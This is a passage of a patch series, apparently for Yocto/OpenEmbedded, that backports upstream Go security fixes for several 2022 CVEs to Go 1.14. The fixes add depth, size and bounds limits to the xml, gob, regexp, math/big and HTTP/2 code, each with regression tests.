19 if val.Kind() != reflect.Ptr {
20 return errors.New("non-pointer passed to Unmarshal")
21 }
22- return d.unmarshal(val.Elem(), start)
23+ return d.unmarshal(val.Elem(), start, 0)
24 }
25
26 // An UnmarshalError represents an error in the unmarshaling process.
27@@ -304,8 +304,15 @@ var (
28 textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
29 )
30
31+const maxUnmarshalDepth = 10000
32+
33+var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
34+
35 // Unmarshal a single XML element into val.
36-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
37+func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
38+ if depth >= maxUnmarshalDepth {
39+ return errExeceededMaxUnmarshalDepth
40+ }
41 // Find start element if we need it.
42 if start == nil {
43 for {
44@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
45 v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
46
47 // Recur to read element into slice.
48- if err := d.unmarshal(v.Index(n), start); err != nil {
49+ if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
50 v.SetLen(n)
51 return err
52 }
53@@ -521,13 +528,15 @@ Loop:
54 case StartElement:
55 consumed := false
56 if sv.IsValid() {
57- consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
58+ // unmarshalPath can call unmarshal, so we need to pass the depth through so that
59+ // we can continue to enforce the maximum recusion limit.
60+ consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
61 if err != nil {
62 return err
63 }
64 if !consumed && saveAny.IsValid() {
65 consumed = true
66- if err := d.unmarshal(saveAny, &t); err != nil {
67+ if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
68 return err
69 }
70 }
71@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
72 // The consumed result tells whether XML elements have been consumed
73 // from the Decoder until start's matching end element, or if it's
74 // still untouched because start is uninteresting for sv's fields.
75-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
76+func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
77 recurse := false
78 Loop:
79 for i := range tinfo.fields {
80@@ -687,7 +696,7 @@ Loop:
81 }
82 if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
83 // It's a perfect match, unmarshal the field.
84- return true, d.unmarshal(finfo.value(sv), start)
85+ return true, d.unmarshal(finfo.value(sv), start, depth+1)
86 }
87 if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
88 // It's a prefix for the field. Break and recurse
89@@ -716,7 +725,9 @@ Loop:
90 }
91 switch t := tok.(type) {
92 case StartElement:
93- consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
94+ // the recursion depth of unmarshalPath is limited to the path length specified
95+ // by the struct field tag, so we don't increment the depth here.
96+ consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
97 if err != nil {
98 return true, err
99 }
100diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
101index 8c2e70f..6a20b1a 100644
102--- a/src/encoding/xml/read_test.go
103+++ b/src/encoding/xml/read_test.go
104@@ -5,6 +5,7 @@
105 package xml
106
107 import (
108+ "errors"
109 "io"
110 "reflect"
111 "strings"
112@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
113 t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
114 }
115 }
116+
117+func TestCVE202228131(t *testing.T) {
118+ type nested struct {
119+ Parent *nested `xml:",any"`
120+ }
121+ var n nested
122+ err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
123+ if err == nil {
124+ t.Fatal("Unmarshal did not fail")
125+ } else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
126+ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
127+ }
128+}
129--
1302.25.1
131
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
1From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 26 Aug 2022 12:17:05 +0530
4Subject: [PATCH] CVE-2022-30635
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
7CVE-2022-30635
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/encoding/gob/decode.go | 19 ++++++++++++-------
11 src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
12 2 files changed, 36 insertions(+), 7 deletions(-)
13
14diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
15index d2f6c74..0e0ec75 100644
16--- a/src/encoding/gob/decode.go
17+++ b/src/encoding/gob/decode.go
18@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
19 return &op
20 }
21
22+var maxIgnoreNestingDepth = 10000
23+
24 // decIgnoreOpFor returns the decoding op for a field that has no destination.
25-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
26+func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
27+ if depth > maxIgnoreNestingDepth {
28+ error_(errors.New("invalid nesting depth"))
29+ }
30 // If this type is already in progress, it's a recursive type (e.g. map[string]*T).
31 // Return the pointer to the op we're already building.
32 if opPtr := inProgress[wireId]; opPtr != nil {
33@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
34 errorf("bad data: undefined type %s", wireId.string())
35 case wire.ArrayT != nil:
36 elemId := wire.ArrayT.Elem
37- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
38+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
39 op = func(i *decInstr, state *decoderState, value reflect.Value) {
40 state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
41 }
42@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
43 case wire.MapT != nil:
44 keyId := dec.wireType[wireId].MapT.Key
45 elemId := dec.wireType[wireId].MapT.Elem
46- keyOp := dec.decIgnoreOpFor(keyId, inProgress)
47- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
48+ keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
49+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
50 op = func(i *decInstr, state *decoderState, value reflect.Value) {
51 state.dec.ignoreMap(state, *keyOp, *elemOp)
52 }
53
54 case wire.SliceT != nil:
55 elemId := wire.SliceT.Elem
56- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
57+ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
58 op = func(i *decInstr, state *decoderState, value reflect.Value) {
59 state.dec.ignoreSlice(state, *elemOp)
60 }
61@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
62 func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
63 engine := new(decEngine)
64 engine.instr = make([]decInstr, 1) // one item
65- op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
66+ op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
67 ovfl := overflow(dec.typeString(remoteId))
68 engine.instr[0] = decInstr{*op, 0, nil, ovfl}
69 engine.numInstr = 1
70@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
71 localField, present := srt.FieldByName(wireField.Name)
72 // TODO(r): anonymous names
73 if !present || !isExported(wireField.Name) {
74- op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
75+ op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
76 engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
77 continue
78 }
79diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
80index 6d2c8db..1b52ecc 100644
81--- a/src/encoding/gob/gobencdec_test.go
82+++ b/src/encoding/gob/gobencdec_test.go
83@@ -12,6 +12,7 @@ import (
84 "fmt"
85 "io"
86 "net"
87+ "reflect"
88 "strings"
89 "testing"
90 "time"
91@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
92 t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
93 }
94 }
95+
96+func TestIngoreDepthLimit(t *testing.T) {
97+ // We don't test the actual depth limit because it requires building an
98+ // extremely large message, which takes quite a while.
99+ oldNestingDepth := maxIgnoreNestingDepth
100+ maxIgnoreNestingDepth = 100
101+ defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
102+ b := new(bytes.Buffer)
103+ enc := NewEncoder(b)
104+ typ := reflect.TypeOf(int(0))
105+ nested := reflect.ArrayOf(1, typ)
106+ for i := 0; i < 100; i++ {
107+ nested = reflect.ArrayOf(1, nested)
108+ }
109+ badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
110+ enc.Encode(badStruct.Interface())
111+ dec := NewDecoder(b)
112+ var output struct{ Hello int }
113+ expectedErr := "invalid nesting depth"
114+ if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
115+ t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
116+ }
117+}
118--
1192.25.1
120
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
1From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 26 Aug 2022 12:48:13 +0530
4Subject: [PATCH] CVE-2022-32148
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
7CVE: CVE-2022-32148
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/net/http/header.go | 6 ++++++
11 src/net/http/header_test.go | 5 +++++
12 2 files changed, 11 insertions(+)
13
14diff --git a/src/net/http/header.go b/src/net/http/header.go
15index b9b5391..221f613 100644
16--- a/src/net/http/header.go
17+++ b/src/net/http/header.go
18@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
19 sv := make([]string, nv) // shared backing array for headers' values
20 h2 := make(Header, len(h))
21 for k, vv := range h {
22+ if vv == nil {
23+ // Preserve nil values. ReverseProxy distinguishes
24+ // between nil and zero-length header values.
25+ h2[k] = nil
26+ continue
27+ }
28 n := copy(sv, vv)
29 h2[k] = sv[:n:n]
30 sv = sv[n:]
31diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
32index 4789362..80c0035 100644
33--- a/src/net/http/header_test.go
34+++ b/src/net/http/header_test.go
35@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
36 in: Header{"foo": {"bar"}},
37 want: Header{"foo": {"bar"}},
38 },
39+ {
40+ name: "nil value",
41+ in: Header{"foo": nil},
42+ want: Header{"foo": nil},
43+ },
44 }
45
46 for _, tt := range tests {
47--
482.25.1
49
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
1From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 29 Aug 2022 10:08:34 +0530
4Subject: [PATCH] CVE-2022-32189
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
7CVE: CVE-2022-32189
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/math/big/floatmarsh.go | 7 +++++++
11 src/math/big/floatmarsh_test.go | 12 ++++++++++++
12 src/math/big/ratmarsh.go | 6 ++++++
13 src/math/big/ratmarsh_test.go | 12 ++++++++++++
14 4 files changed, 37 insertions(+)
15
16diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
17index d1c1dab..990e085 100644
18--- a/src/math/big/floatmarsh.go
19+++ b/src/math/big/floatmarsh.go
20@@ -8,6 +8,7 @@ package big
21
22 import (
23 "encoding/binary"
24+ "errors"
25 "fmt"
26 )
27
28@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
29 *z = Float{}
30 return nil
31 }
32+ if len(buf) < 6 {
33+ return errors.New("Float.GobDecode: buffer too small")
34+ }
35
36 if buf[0] != floatGobVersion {
37 return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
38@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
39 z.prec = binary.BigEndian.Uint32(buf[2:])
40
41 if z.form == finite {
42+ if len(buf) < 10 {
43+ return errors.New("Float.GobDecode: buffer too small for finite form float")
44+ }
45 z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
46 z.mant = z.mant.setBytes(buf[10:])
47 }
48diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
49index c056d78..401f45a 100644
50--- a/src/math/big/floatmarsh_test.go
51+++ b/src/math/big/floatmarsh_test.go
52@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
53 }
54 }
55 }
56+
57+func TestFloatGobDecodeShortBuffer(t *testing.T) {
58+ for _, tc := range [][]byte{
59+ []byte{0x1, 0x0, 0x0, 0x0},
60+ []byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
61+ } {
62+ err := NewFloat(0).GobDecode(tc)
63+ if err == nil {
64+ t.Error("expected GobDecode to return error for malformed input")
65+ }
66+ }
67+}
68diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
69index fbc7b60..56102e8 100644
70--- a/src/math/big/ratmarsh.go
71+++ b/src/math/big/ratmarsh.go
72@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
73 *z = Rat{}
74 return nil
75 }
76+ if len(buf) < 5 {
77+ return errors.New("Rat.GobDecode: buffer too small")
78+ }
79 b := buf[0]
80 if b>>1 != ratGobVersion {
81 return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
82 }
83 const j = 1 + 4
84 i := j + binary.BigEndian.Uint32(buf[j-4:j])
85+ if len(buf) < int(i) {
86+ return errors.New("Rat.GobDecode: buffer too small")
87+ }
88 z.a.neg = b&1 != 0
89 z.a.abs = z.a.abs.setBytes(buf[j:i])
90 z.b.abs = z.b.abs.setBytes(buf[i:])
91diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
92index 351d109..55a9878 100644
93--- a/src/math/big/ratmarsh_test.go
94+++ b/src/math/big/ratmarsh_test.go
95@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
96 }
97 }
98 }
99+
100+func TestRatGobDecodeShortBuffer(t *testing.T) {
101+ for _, tc := range [][]byte{
102+ []byte{0x2},
103+ []byte{0x2, 0x0, 0x0, 0x0, 0xff},
104+ } {
105+ err := NewRat(1, 2).GobDecode(tc)
106+ if err == nil {
107+ t.Error("expected GobDecode to return error for malformed input")
108+ }
109+ }
110+}
111--
1122.25.1
113
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
1From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
2From: Russ Cox <rsc@golang.org>
3Date: Wed, 28 Sep 2022 11:18:51 -0400
4Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
5
6Set a 128 MB limit on the amount of space used by []syntax.Inst
7in the compiled form corresponding to a given regexp.
8
9Also set a 128 MB limit on the rune storage in the *syntax.Regexp
10tree itself.
11
12Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
13
14Fixes CVE-2022-41715.
15Updates #55949.
16Fixes #55950.
17
18Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
19Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
20TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
21Reviewed-by: Damien Neil <dneil@google.com>
22Run-TryBot: Roland Shoemaker <bracewell@google.com>
23Reviewed-by: Julie Qiu <julieqiu@google.com>
24Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
25Run-TryBot: Carlos Amedee <carlos@golang.org>
26Reviewed-by: Carlos Amedee <carlos@golang.org>
27Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
28TryBot-Result: Gopher Robot <gobot@golang.org>
29Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
30
31Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
32CVE: CVE-2022-41715
33Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
34
35---
36 src/regexp/syntax/parse.go | 145 ++++++++++++++++++++++++++++++--
37 src/regexp/syntax/parse_test.go | 13 +--
38 2 files changed, 148 insertions(+), 10 deletions(-)
39
40diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
41index 55bd20d..60491d5 100644
42--- a/src/regexp/syntax/parse.go
43+++ b/src/regexp/syntax/parse.go
44@@ -90,15 +90,49 @@ const (
45 // until we've allocated at least maxHeight Regexp structures.
46 const maxHeight = 1000
47
48+// maxSize is the maximum size of a compiled regexp in Insts.
49+// It too is somewhat arbitrarily chosen, but the idea is to be large enough
50+// to allow significant regexps while at the same time small enough that
51+// the compiled form will not take up too much memory.
52+// 128 MB is enough for a 3.3 million Inst structures, which roughly
53+// corresponds to a 3.3 MB regexp.
54+const (
55+ maxSize = 128 << 20 / instSize
56+ instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
57+)
58+
59+// maxRunes is the maximum number of runes allowed in a regexp tree
60+// counting the runes in all the nodes.
61+// Ignoring character classes p.numRunes is always less than the length of the regexp.
62+// Character classes can make it much larger: each \pL adds 1292 runes.
63+// 128 MB is enough for 32M runes, which is over 26k \pL instances.
64+// Note that repetitions do not make copies of the rune slices,
65+// so \pL{1000} is only one rune slice, not 1000.
66+// We could keep a cache of character classes we've seen,
67+// so that all the \pL we see use the same rune list,
68+// but that doesn't remove the problem entirely:
69+// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
70+// And because the Rune slice is exposed directly in the Regexp,
71+// there is not an opportunity to change the representation to allow
72+// partial sharing between different character classes.
73+// So the limit is the best we can do.
74+const (
75+ maxRunes = 128 << 20 / runeSize
76+ runeSize = 4 // rune is int32
77+)
78+
79 type parser struct {
80 flags Flags // parse mode flags
81 stack []*Regexp // stack of parsed expressions
82 free *Regexp
83 numCap int // number of capturing groups seen
84 wholeRegexp string
85- tmpClass []rune // temporary char class work space
86- numRegexp int // number of regexps allocated
87- height map[*Regexp]int // regexp height for height limit check
88+ tmpClass []rune // temporary char class work space
89+ numRegexp int // number of regexps allocated
90+ numRunes int // number of runes in char classes
91+ repeats int64 // product of all repetitions seen
92+ height map[*Regexp]int // regexp height, for height limit check
93+ size map[*Regexp]int64 // regexp compiled size, for size limit check
94 }
95
96 func (p *parser) newRegexp(op Op) *Regexp {
97@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
98 p.free = re
99 }
100
101+func (p *parser) checkLimits(re *Regexp) {
102+ if p.numRunes > maxRunes {
103+ panic(ErrInternalError)
104+ }
105+ p.checkSize(re)
106+ p.checkHeight(re)
107+}
108+
109+func (p *parser) checkSize(re *Regexp) {
110+ if p.size == nil {
111+ // We haven't started tracking size yet.
112+ // Do a relatively cheap check to see if we need to start.
113+ // Maintain the product of all the repeats we've seen
114+ // and don't track if the total number of regexp nodes
115+ // we've seen times the repeat product is in budget.
116+ if p.repeats == 0 {
117+ p.repeats = 1
118+ }
119+ if re.Op == OpRepeat {
120+ n := re.Max
121+ if n == -1 {
122+ n = re.Min
123+ }
124+ if n <= 0 {
125+ n = 1
126+ }
127+ if int64(n) > maxSize/p.repeats {
128+ p.repeats = maxSize
129+ } else {
130+ p.repeats *= int64(n)
131+ }
132+ }
133+ if int64(p.numRegexp) < maxSize/p.repeats {
134+ return
135+ }
136+
137+ // We need to start tracking size.
138+ // Make the map and belatedly populate it
139+ // with info about everything we've constructed so far.
140+ p.size = make(map[*Regexp]int64)
141+ for _, re := range p.stack {
142+ p.checkSize(re)
143+ }
144+ }
145+
146+ if p.calcSize(re, true) > maxSize {
147+ panic(ErrInternalError)
148+ }
149+}
150+
151+func (p *parser) calcSize(re *Regexp, force bool) int64 {
152+ if !force {
153+ if size, ok := p.size[re]; ok {
154+ return size
155+ }
156+ }
157+
158+ var size int64
159+ switch re.Op {
160+ case OpLiteral:
161+ size = int64(len(re.Rune))
162+ case OpCapture, OpStar:
163+ // star can be 1+ or 2+; assume 2 pessimistically
164+ size = 2 + p.calcSize(re.Sub[0], false)
165+ case OpPlus, OpQuest:
166+ size = 1 + p.calcSize(re.Sub[0], false)
167+ case OpConcat:
168+ for _, sub := range re.Sub {
169+ size += p.calcSize(sub, false)
170+ }
171+ case OpAlternate:
172+ for _, sub := range re.Sub {
173+ size += p.calcSize(sub, false)
174+ }
175+ if len(re.Sub) > 1 {
176+ size += int64(len(re.Sub)) - 1
177+ }
178+ case OpRepeat:
179+ sub := p.calcSize(re.Sub[0], false)
180+ if re.Max == -1 {
181+ if re.Min == 0 {
182+ size = 2 + sub // x*
183+ } else {
184+ size = 1 + int64(re.Min)*sub // xxx+
185+ }
186+ break
187+ }
188+ // x{2,5} = xx(x(x(x)?)?)?
189+ size = int64(re.Max)*sub + int64(re.Max-re.Min)
190+ }
191+
192+ if size < 1 {
193+ size = 1
194+ }
195+ p.size[re] = size
196+ return size
197+}
198+
199 func (p *parser) checkHeight(re *Regexp) {
200 if p.numRegexp < maxHeight {
201 return
202@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
203
204 // push pushes the regexp re onto the parse stack and returns the regexp.
205 func (p *parser) push(re *Regexp) *Regexp {
206+ p.numRunes += len(re.Rune)
207 if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
208 // Single rune.
209 if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
210@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
211 }
212
213 p.stack = append(p.stack, re)
214- p.checkHeight(re)
215+ p.checkLimits(re)
216 return re
217 }
218
219@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
220 re.Sub = re.Sub0[:1]
221 re.Sub[0] = sub
222 p.stack[n-1] = re
223- p.checkHeight(re)
224+ p.checkLimits(re)
225
226 if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
227 return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
228@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
229
230 for j := start; j < i; j++ {
231 sub[j] = p.removeLeadingString(sub[j], len(str))
232+ p.checkLimits(sub[j])
233 }
234 suffix := p.collapse(sub[start:i], OpAlternate) // recurse
235
236@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
237 for j := start; j < i; j++ {
238 reuse := j != start // prefix came from sub[start]
239 sub[j] = p.removeLeadingRegexp(sub[j], reuse)
240+ p.checkLimits(sub[j])
241 }
242 suffix := p.collapse(sub[start:i], OpAlternate) // recurse
243
244diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
245index 1ef6d8a..67e3c56 100644
246--- a/src/regexp/syntax/parse_test.go
247+++ b/src/regexp/syntax/parse_test.go
248@@ -484,12 +484,15 @@ var invalidRegexps = []string{
249 `(?P<>a)`,
250 `[a-Z]`,
251 `(?i)[a-Z]`,
252- `a{100000}`,
253- `a{100000,}`,
254- "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
255- strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
256- strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
257 `\Q\E*`,
258+ `a{100000}`, // too much repetition
259+ `a{100000,}`, // too much repetition
260+ "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})", // too much repetition
261+ strings.Repeat("(", 1000) + strings.Repeat(")", 1000), // too deep
262+ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
263+ "(" + strings.Repeat("(xx?)", 1000) + "){1000}", // too long
264+ strings.Repeat("(xx?){1000}", 1000), // too long
265+ strings.Repeat(`\pL`, 27000), // too many runes
266 }
267
268 var onlyPerl = []string{
269--
2702.25.1
271
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
new file mode 100644
index 0000000000..8bf22ee4d4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
1From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Wed, 30 Nov 2022 16:46:33 -0500
4Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
5 golang.org/x/net/http2
6
7Disable cmd/internal/moddeps test, since this update includes PRIVATE
8track fixes.
9
10For #56350.
11For #57009.
12Fixes CVE-2022-41717.
13
14Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
15Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
16Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
17Reviewed-by: Julie Qiu <julieqiu@google.com>
18Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
19TryBot-Result: Gopher Robot <gobot@golang.org>
20Run-TryBot: Jenny Rakoczy <jenny@golang.org>
21Reviewed-by: Michael Pratt <mpratt@google.com>
22
23Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
24CVE-2022-41717
25Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
26---
27 src/net/http/h2_bundle.go | 18 +++++++++++-------
28 1 file changed, 11 insertions(+), 7 deletions(-)
29
30diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
31index 83f2a72..cc03a62 100644
32--- a/src/net/http/h2_bundle.go
33+++ b/src/net/http/h2_bundle.go
34@@ -4096,6 +4096,7 @@ type http2serverConn struct {
35 headerTableSize uint32
36 peerMaxHeaderListSize uint32 // zero means unknown (default)
37 canonHeader map[string]string // http2-lower-case -> Go-Canonical-Case
38+ canonHeaderKeysSize int // canonHeader keys size in bytes
39 writingFrame bool // started writing a frame (on serve goroutine or separate)
40 writingFrameAsync bool // started a frame on its own goroutine but haven't heard back on wroteFrameCh
41 needsFrameFlush bool // last frame write wasn't a flush
42@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
43 }
44 }
45
46+// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
47+// of the entries in the canonHeader cache.
48+// This should be larger than the size of unique, uncommon header keys likely to
49+// be sent by the peer, while not so high as to permit unreasonable memory usage
50+// if the peer sends an unbounded number of unique header keys.
51+const http2maxCachedCanonicalHeadersKeysSize = 2048
52+
53 func (sc *http2serverConn) canonicalHeader(v string) string {
54 sc.serveG.check()
55 http2buildCommonHeaderMapsOnce()
56@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
57 sc.canonHeader = make(map[string]string)
58 }
59 cv = CanonicalHeaderKey(v)
60- // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
61- // entries in the canonHeader cache. This should be larger than the number
62- // of unique, uncommon header keys likely to be sent by the peer, while not
63- // so high as to permit unreaasonable memory usage if the peer sends an unbounded
64- // number of unique header keys.
65- const maxCachedCanonicalHeaders = 32
66- if len(sc.canonHeader) < maxCachedCanonicalHeaders {
67+ size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
68+ if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
69 sc.canonHeader[v] = cv
70+ sc.canonHeaderKeysSize += size
71 }
72 return cv
73 }
74--
752.30.2
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
new file mode 100644
index 0000000000..f5bffd7a0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
